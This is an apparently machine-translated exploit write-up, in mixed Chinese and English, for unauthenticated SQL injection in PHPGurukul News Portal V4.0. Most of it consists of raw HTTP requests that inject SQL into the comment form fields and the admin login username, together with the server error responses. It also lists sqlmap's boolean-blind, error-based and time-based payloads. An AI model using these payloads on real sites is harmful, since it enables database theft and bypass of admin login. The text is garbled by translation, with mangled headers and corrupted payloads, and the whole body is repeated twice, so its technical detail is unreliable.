#利用标题:新闻门户V4.0 -SQL注入(未经授权)
#日期: 09/07/2023
#利用作者: Hubert Wojciechowski
#联系作者: [email protected]
#供应商homepage3360 https://phpgurukul.com/news-portal-project-in-php-and-mysql/c
#软件link: https://phpgurukul.com/?sdm_process_download=1download_id=7643
#版本: 4.0
#我们正在寻找工作安全工程师,安全管理员: https://www.pracuj.pl/PRACA/SECURITY-ENGINEER-WARSZAWA-PLOCKA-9-11,11,1002635314
#使用XAMPP,Apache/2.4.48(Win64)OpenSSL/1.1.1.1L PHP/7.4.4.23测试了: Windows 10
##示例1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PARAM:名称,电子邮件,评论
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
req
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
post/newsportal/news-details.php?nid=13 http/1.1
Origin: http://127.0.0.1
sec-fetch-user:1
HOST: 127.0.0.1:80
Accept-Language: PL-PL,PL; Q=0.9,EN-US; Q=0.8,en; q=0.7
Accept-incoding: Gzip,放气
sec-fetch-site:相同原产
sec-ch-ua-mobile:0
内容长度: 277
sec-fetch mode:导航
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.127 Safari/537.36
连接:关闭
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-ch-ua-platform:'Windows'
cache-control: max-age=0
content-type:应用程序/x-www-form-urlenceded
sec-ch-ua:'铬'; v='113','not-a.brand'; v='24'
sec-fetch-Dest:文档
csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956ddname=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x7364736 1646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''email=admin%40local.hostcomment=sssssssssssssssssssssssssssubmit
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
日期: Sun,09 Jul 2023 10:55:26 GMT
server: apache/2.4.56(win64)openssl/1.1.1t php/8.1.17
X-Power-By-By: php/8.1.17
set-cookie: phpsessid=l7dg3s1in50ojigs4vm2p0r9s;路径=/
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
连接:关闭
content-type:文本/html; charset=UTF-8
内容长度: 146161
ScriptTalet(“成功提交评论。
!doctype html
html lang='en'
头
meta charset='utf-8'
meta name='viewport'content='width=设备宽度,初始尺度=1,缩水到拟合=否'
元名称='描述'content=''
meta名称='作者'content=''
titlenews门户|主页
[.]
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
req
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
post/newsportal/news-details.php?nid=13 http/1.1
Origin: http://127.0.0.1
sec-fetch-user:1
HOST: 127.0.0.1:80
Accept-Language: PL-PL,PL; Q=0.9,EN-US; Q=0.8,en; q=0.7
Accept-incoding: Gzip,放气
sec-fetch-site:相同原产
sec-ch-ua-mobile:0
内容长度: 276
sec-fetch mode:导航
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.127 Safari/537.36
连接:关闭
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-ch-ua-platform:'Windows'
cache-control: max-age=0
content-type:应用程序/x-www-form-urlenceded
sec-ch-ua:'铬'; v='113','not-a.brand'; v='24'
sec-fetch-Dest:文档
csrftoken=400EB8AE07C6693E68D5F0F5B76920FF294C09D33E70526C7708609A51956DDNAME=(select%20(case%20WHEN%20(CASE%20 WHEN%20(8137%3D645%)) 61646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'email=admin%40local.hostcomment=sssssssssssssssssssssssssssubmit
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
日期: Sun,09 Jul 2023 10:56:06 GMT
server: apache/2.4.56(win64)openssl/1.1.1t php/8.1.17
X-Power-By-By: php/8.1.17
set-cookie: phpsessid=fcju4nb9mr2tu80mqv5cnduldk;路径=/
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
内容长度: 525
连接:关闭
content-type:文本/html; charset=UTF-8
br /
BFATAL错误/B:未接收的mysqli_sql_exception:您在SQL语法中有一个错误; check the manual that corresponds to your MariaDB server version for the right syntax to use near '[email protected]','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21
堆栈跟踪:
#0 C: \ XAMPP3 \ htdocs \ newsportal \ news-details.php(21): mysqli_query(object(mysqli),'插入tbl .')
#1 {main}
在B21/bbr/w的BC: \ Xampp3 \ Xampp3 \ htdocs \ htdocs \ newsportal \ news-details.php/b上
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
sqlmap示例param'comment':
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
SQLMAP确定了以下注射点,总计450 HTTP请求:
---
参数:#2*((自定义)帖子)
Type:基于布尔的盲人
title: mysql rlike bool -Bind Binder-在哪里,订购,订购或组。
PAYLOAD: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956ddname=sdsadasdasemail=[email protected]=ssssssssssssssssssssssssss' rlike(select(select(3649=3649),则0x73737373737373737373737373737373737373737373737373737373737373737373737373其他0x28 END)
type:基于错误的
title: mysql=5.0或基于错误的- 在哪里,订购,按子句(floor)
PAYLOAD: csrftoken=400EB8AE07C6693E68D5F5B76920FF294C09D33E70526C7708609A51956DDNAME=SDSADASDASADASDASEMAIL=ADMIN@LOCAL.HOSTCOMSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss'或(从(选择count(*),concat(0x71787a7671),(select(select(elt(6120=6120,1))))),0x7170717071,floor(rand(0)*2)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956ddname=sdsadasdasemail=[email protected]=ssssssssssssssssssssssssss' (从(select(sleep(5))MZUX选择1610)和'bjco'='bjcosubmit=
---
Web Application Technology: PHP 8.1.17,Apache 2.4.56
BACCK-END DBMS: mySQL=5.0(Mariadb叉)
##示例2-登录到管理面板
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PARAM:用户名
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
req
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST/NEWSPORTAL/ADMIN/HTTP/1.1
HOST: 127.0.0.1
内容长度: 42
cache-control: max-age=0
sec-ch-ua:'铬'; v='113','not-a.brand'; v='24'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://127.0.0.1
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.127 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
REFEER: http://127.0.0.0.1/newsportal/admin/
Accept-incoding: Gzip,放气
Accept-Language: PL-PL,PL; Q=0.9,EN-US; Q=0.8,en; q=0.7
cookie: userub_type=0; is_moderator=0;回复sort_order=asc; showtimelog=yes; USER_UNIQ_AGENT=95E1B7D0AB9086D6B88E9ADFAACF07D887164827A5708ADF; ses_role=3; USER_UNIQ=117B06DA2FF9AABAD1A916992E92BB26; USERTYP=3; usertz=33; helpdesk_uniq_agent=%7b%22TEMP_NAME%22%3A%22 -test%22%2C%22%22 Email%22%3A%22 -test%40local.host%22%7d; CPUID=8DBA9A451F44121C45180DF414AB6917; default_page=dashboard; current_filter=案例;货币=usd; phpsessid-9795-sid=S7B0DQLPEBU74LS14J61E5Q3BE; Stelem __ stickysidebarelement=%5BID%3A0%5D%5D%5DBVALUE%3anoclass%5D%23%5BID%3A1%3A1%5D%5D%3anoclue%3anoclass%5D%5D%23%23%5BID%3A2%3A2%3A2%5D%5DBVALUE%5BVALUE%3anoclase%3anoclass%5D%5D%23%23%23%5D 5B ID%3A3%5D%5D%3AClass%5D%23%5D%5DBID%3A4%5D%5D%5D%3Anoclass%5D%23%5DBID%3A5%5D%5D%5D%5D%5DBVALUE%3anoclue%3anoclase%5D%5D%23%3A6%3A6%3A6%5D%5D%5DBVALUE 5DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDED 5DDDDD%很多3%5%5DDDDDD%很高。 wbcelastConnectjs=1688869781; phpsessID=2VAG12CAOQVV76AVBESLM65JE8
连接:关闭
用户名=Admin'Password=test%40123Login=
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
日期: Sun,09 Jul 2023 11:00:53 GMT
server: apache/2.4.56(win64)openssl/1.1.1t php/8.1.17
X-Power-By-By: php/8.1.17
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
内容长度: 505
连接:关闭
content-type:文本/html; charset=UTF-8
br /
BFATAL错误/B:未接收的mysqli_sql_exception:您在SQL语法中有一个错误; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13
堆栈跟踪:
#0 C: \ XAMPP3 \ htdocs \ newsportal \ admin \ index.php(13): mysqli_query(object(mysqli),'select adminuse .')
#1 {main}
在BC: \ XAMPP3 \ HTDOCS \ Newsportal \ Admin \ Index.php/b上扔进。
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
req
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST/NEWSPORTAL/ADMIN/HTTP/1.1
HOST: 127.0.0.1
内容长度: 43
cache-control: max-age=0
sec-ch-ua:'铬'; v='113','not-a.brand'; v='24'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://127.0.0.1
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.127 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
REFEER: http://127.0.0.0.1/newsportal/admin/
Accept-incoding: Gzip,放气
Accept-Language: PL-PL,PL; Q=0.9,EN-US; Q=0.8,en; q=0.7
cookie: userub_type=0; is_moderator=0;回复sort_order=asc; showtimelog=yes; USER_UNIQ_AGENT=95E1B7D0AB9086D6B88E9ADFAACF07D887164827A5708ADF; ses_role=3; USER_UNIQ=117B06DA2FF9AABAD1A916992E92BB26; USERTYP=3; usertz=33; helpdesk_uniq_agent=%7b%22TEMP_NAME%22%3A%22 -test%22%2C%22%22 Email%22%3A%22 -test%40local.host%22%7d; CPUID=8DBA9A451F44121C45180DF414AB6917; default_page=dashboard; current_filter=案例;货币=usd; phpsessid-9795-sid=S7B0DQLPEBU74LS14J61E5Q3BE; Stelem __ stickysidebarelement=%5BID%3A0%5D%5D%5DBVALUE%3anoclass%5D%23%5BID%3A1%3A1%5D%5D%3anoclue%3anoclass%5D%5D%23%23%5BID%3A2%3A2%3A2%5D%5DBVALUE%5BVALUE%3anoclase%3anoclass%5D%5D%23%23%23%5D 5B ID%3A3%5D%5D%3AClass%5D%23%5D%5DBID%3A4%5D%5D%5D%3Anoclass%5D%23%5DBID%3A5%5D%5D%5D%5D%5DBVALUE%3anoclue%3anoclase%5D%5D%23%3A6%3A6%3A6%5D%5D%5DBVALUE 5DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDED 5DDDDD%很多3%5%5DDDDDD%很高。 wbcelastConnectjs=1688869781; phpsessID=2VAG12CAOQVV76AVBESLM65JE8
连接:关闭
用户名=admin'''Password=test%40123login=
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
日期: Sun,09 Jul 2023 11:02:15 GMT
server: apache/2.4.56(win64)openssl/1.1.1t php/8.1.17
X-Power-By-By: php/8.1.17
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
内容长度: 4733
连接:关闭
content-type:文本/html; charset=UTF-8
ScriptTalert(“无效详细信息”);/script
!doctype html
html lang='en'
头
meta charset='utf-8'
meta name='viewport'content='width=设备宽度,初始尺度=1.0'
meta名称='description'content='新闻门户。
meta name='作者'content='phpgurukul'
! - 应用标题-
titlenews门户|管理面板/标题
[.]
#日期: 09/07/2023
#利用作者: Hubert Wojciechowski
#联系作者: [email protected]
#供应商homepage3360 https://phpgurukul.com/news-portal-project-in-php-and-mysql/c
#软件link: https://phpgurukul.com/?sdm_process_download=1download_id=7643
#版本: 4.0
#我们正在寻找工作安全工程师,安全管理员: https://www.pracuj.pl/PRACA/SECURITY-ENGINEER-WARSZAWA-PLOCKA-9-11,11,1002635314
#使用XAMPP,Apache/2.4.48(Win64)OpenSSL/1.1.1.1L PHP/7.4.4.23测试了: Windows 10
##示例1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PARAM:名称,电子邮件,评论
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
req
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
post/newsportal/news-details.php?nid=13 http/1.1
Origin: http://127.0.0.1
sec-fetch-user:1
HOST: 127.0.0.1:80
Accept-Language: PL-PL,PL; Q=0.9,EN-US; Q=0.8,en; q=0.7
Accept-incoding: Gzip,放气
sec-fetch-site:相同原产
sec-ch-ua-mobile:0
内容长度: 277
sec-fetch mode:导航
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.127 Safari/537.36
连接:关闭
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-ch-ua-platform:'Windows'
cache-control: max-age=0
content-type:应用程序/x-www-form-urlenceded
sec-ch-ua:'铬'; v='113','not-a.brand'; v='24'
sec-fetch-Dest:文档
csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956ddname=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x7364736 1646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''email=admin%40local.hostcomment=sssssssssssssssssssssssssssubmit
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
日期: Sun,09 Jul 2023 10:55:26 GMT
server: apache/2.4.56(win64)openssl/1.1.1t php/8.1.17
X-Power-By-By: php/8.1.17
set-cookie: phpsessid=l7dg3s1in50ojigs4vm2p0r9s;路径=/
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
连接:关闭
content-type:文本/html; charset=UTF-8
内容长度: 146161
ScriptTalet(“成功提交评论。
!doctype html
html lang='en'
头
meta charset='utf-8'
meta name='viewport'content='width=设备宽度,初始尺度=1,缩水到拟合=否'
元名称='描述'content=''
meta名称='作者'content=''
titlenews门户|主页
[.]
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
req
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
post/newsportal/news-details.php?nid=13 http/1.1
Origin: http://127.0.0.1
sec-fetch-user:1
HOST: 127.0.0.1:80
Accept-Language: PL-PL,PL; Q=0.9,EN-US; Q=0.8,en; q=0.7
Accept-incoding: Gzip,放气
sec-fetch-site:相同原产
sec-ch-ua-mobile:0
内容长度: 276
sec-fetch mode:导航
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.127 Safari/537.36
连接:关闭
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-ch-ua-platform:'Windows'
cache-control: max-age=0
content-type:应用程序/x-www-form-urlenceded
sec-ch-ua:'铬'; v='113','not-a.brand'; v='24'
sec-fetch-Dest:文档
csrftoken=400EB8AE07C6693E68D5F0F5B76920FF294C09D33E70526C7708609A51956DDNAME=(select%20(case%20WHEN%20(CASE%20 WHEN%20(8137%3D645%)) 61646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'email=admin%40local.hostcomment=sssssssssssssssssssssssssssubmit
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
日期: Sun,09 Jul 2023 10:56:06 GMT
server: apache/2.4.56(win64)openssl/1.1.1t php/8.1.17
X-Power-By-By: php/8.1.17
set-cookie: phpsessid=fcju4nb9mr2tu80mqv5cnduldk;路径=/
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
内容长度: 525
连接:关闭
content-type:文本/html; charset=UTF-8
br /
BFATAL错误/B:未接收的mysqli_sql_exception:您在SQL语法中有一个错误; check the manual that corresponds to your MariaDB server version for the right syntax to use near '[email protected]','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21
堆栈跟踪:
#0 C: \ XAMPP3 \ htdocs \ newsportal \ news-details.php(21): mysqli_query(object(mysqli),'插入tbl .')
#1 {main}
在B21/bbr/w的BC: \ Xampp3 \ Xampp3 \ htdocs \ htdocs \ newsportal \ news-details.php/b上
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
sqlmap示例param'comment':
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
SQLMAP确定了以下注射点,总计450 HTTP请求:
---
参数:#2*((自定义)帖子)
Type:基于布尔的盲人
title: mysql rlike bool -Bind Binder-在哪里,订购,订购或组。
PAYLOAD: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956ddname=sdsadasdasemail=[email protected]=ssssssssssssssssssssssssss' rlike(select(select(3649=3649),则0x73737373737373737373737373737373737373737373737373737373737373737373737373其他0x28 END)
type:基于错误的
title: mysql=5.0或基于错误的- 在哪里,订购,按子句(floor)
PAYLOAD: csrftoken=400EB8AE07C6693E68D5F5B76920FF294C09D33E70526C7708609A51956DDNAME=SDSADASDASADASDASEMAIL=ADMIN@LOCAL.HOSTCOMSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss'或(从(选择count(*),concat(0x71787a7671),(select(select(elt(6120=6120,1))))),0x7170717071,floor(rand(0)*2)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956ddname=sdsadasdasemail=[email protected]=ssssssssssssssssssssssssss' (从(select(sleep(5))MZUX选择1610)和'bjco'='bjcosubmit=
---
Web Application Technology: PHP 8.1.17,Apache 2.4.56
BACCK-END DBMS: mySQL=5.0(Mariadb叉)
##示例2-登录到管理面板
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PARAM:用户名
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
req
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST/NEWSPORTAL/ADMIN/HTTP/1.1
HOST: 127.0.0.1
内容长度: 42
cache-control: max-age=0
sec-ch-ua:'铬'; v='113','not-a.brand'; v='24'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://127.0.0.1
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.127 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
REFEER: http://127.0.0.0.1/newsportal/admin/
Accept-incoding: Gzip,放气
Accept-Language: PL-PL,PL; Q=0.9,EN-US; Q=0.8,en; q=0.7
cookie: userub_type=0; is_moderator=0;回复sort_order=asc; showtimelog=yes; USER_UNIQ_AGENT=95E1B7D0AB9086D6B88E9ADFAACF07D887164827A5708ADF; ses_role=3; USER_UNIQ=117B06DA2FF9AABAD1A916992E92BB26; USERTYP=3; usertz=33; helpdesk_uniq_agent=%7b%22TEMP_NAME%22%3A%22 -test%22%2C%22%22 Email%22%3A%22 -test%40local.host%22%7d; CPUID=8DBA9A451F44121C45180DF414AB6917; default_page=dashboard; current_filter=案例;货币=usd; phpsessid-9795-sid=S7B0DQLPEBU74LS14J61E5Q3BE; Stelem __ stickysidebarelement=%5BID%3A0%5D%5D%5DBVALUE%3anoclass%5D%23%5BID%3A1%3A1%5D%5D%3anoclue%3anoclass%5D%5D%23%23%5BID%3A2%3A2%3A2%5D%5DBVALUE%5BVALUE%3anoclase%3anoclass%5D%5D%23%23%23%5D 5B ID%3A3%5D%5D%3AClass%5D%23%5D%5DBID%3A4%5D%5D%5D%3Anoclass%5D%23%5DBID%3A5%5D%5D%5D%5D%5DBVALUE%3anoclue%3anoclase%5D%5D%23%3A6%3A6%3A6%5D%5D%5DBVALUE 5DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDED 5DDDDD%很多3%5%5DDDDDD%很高。 wbcelastConnectjs=1688869781; phpsessID=2VAG12CAOQVV76AVBESLM65JE8
连接:关闭
用户名=Admin'Password=test%40123Login=
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
日期: Sun,09 Jul 2023 11:00:53 GMT
server: apache/2.4.56(win64)openssl/1.1.1t php/8.1.17
X-Power-By-By: php/8.1.17
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
内容长度: 505
连接:关闭
content-type:文本/html; charset=UTF-8
br /
BFATAL错误/B:未接收的mysqli_sql_exception:您在SQL语法中有一个错误; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13
堆栈跟踪:
#0 C: \ XAMPP3 \ htdocs \ newsportal \ admin \ index.php(13): mysqli_query(object(mysqli),'select adminuse .')
#1 {main}
在BC: \ XAMPP3 \ HTDOCS \ Newsportal \ Admin \ Index.php/b上扔进。
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
req
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST/NEWSPORTAL/ADMIN/HTTP/1.1
HOST: 127.0.0.1
内容长度: 43
cache-control: max-age=0
sec-ch-ua:'铬'; v='113','not-a.brand'; v='24'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://127.0.0.1
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/113.0.5672.127 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
REFEER: http://127.0.0.0.1/newsportal/admin/
Accept-incoding: Gzip,放气
Accept-Language: PL-PL,PL; Q=0.9,EN-US; Q=0.8,en; q=0.7
cookie: userub_type=0; is_moderator=0;回复sort_order=asc; showtimelog=yes; USER_UNIQ_AGENT=95E1B7D0AB9086D6B88E9ADFAACF07D887164827A5708ADF; ses_role=3; USER_UNIQ=117B06DA2FF9AABAD1A916992E92BB26; USERTYP=3; usertz=33; helpdesk_uniq_agent=%7b%22TEMP_NAME%22%3A%22 -test%22%2C%22%22 Email%22%3A%22 -test%40local.host%22%7d; CPUID=8DBA9A451F44121C45180DF414AB6917; default_page=dashboard; current_filter=案例;货币=usd; phpsessid-9795-sid=S7B0DQLPEBU74LS14J61E5Q3BE; Stelem __ stickysidebarelement=%5BID%3A0%5D%5D%5DBVALUE%3anoclass%5D%23%5BID%3A1%3A1%5D%5D%3anoclue%3anoclass%5D%5D%23%23%5BID%3A2%3A2%3A2%5D%5DBVALUE%5BVALUE%3anoclase%3anoclass%5D%5D%23%23%23%5D 5B ID%3A3%5D%5D%3AClass%5D%23%5D%5DBID%3A4%5D%5D%5D%3Anoclass%5D%23%5DBID%3A5%5D%5D%5D%5D%5DBVALUE%3anoclue%3anoclase%5D%5D%23%3A6%3A6%3A6%5D%5D%5DBVALUE 5DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDED 5DDDDD%很多3%5%5DDDDDD%很高。 wbcelastConnectjs=1688869781; phpsessID=2VAG12CAOQVV76AVBESLM65JE8
连接:关闭
用户名=admin'''Password=test%40123login=
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
日期: Sun,09 Jul 2023 11:02:15 GMT
server: apache/2.4.56(win64)openssl/1.1.1t php/8.1.17
X-Power-By-By: php/8.1.17
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
内容长度: 4733
连接:关闭
content-type:文本/html; charset=UTF-8
ScriptTalert(“无效详细信息”);/script
!doctype html
html lang='en'
头
meta charset='utf-8'
meta name='viewport'content='width=设备宽度,初始尺度=1.0'
meta名称='description'content='新闻门户。
meta name='作者'content='phpgurukul'
! - 应用标题-
titlenews门户|管理面板/标题
[.]
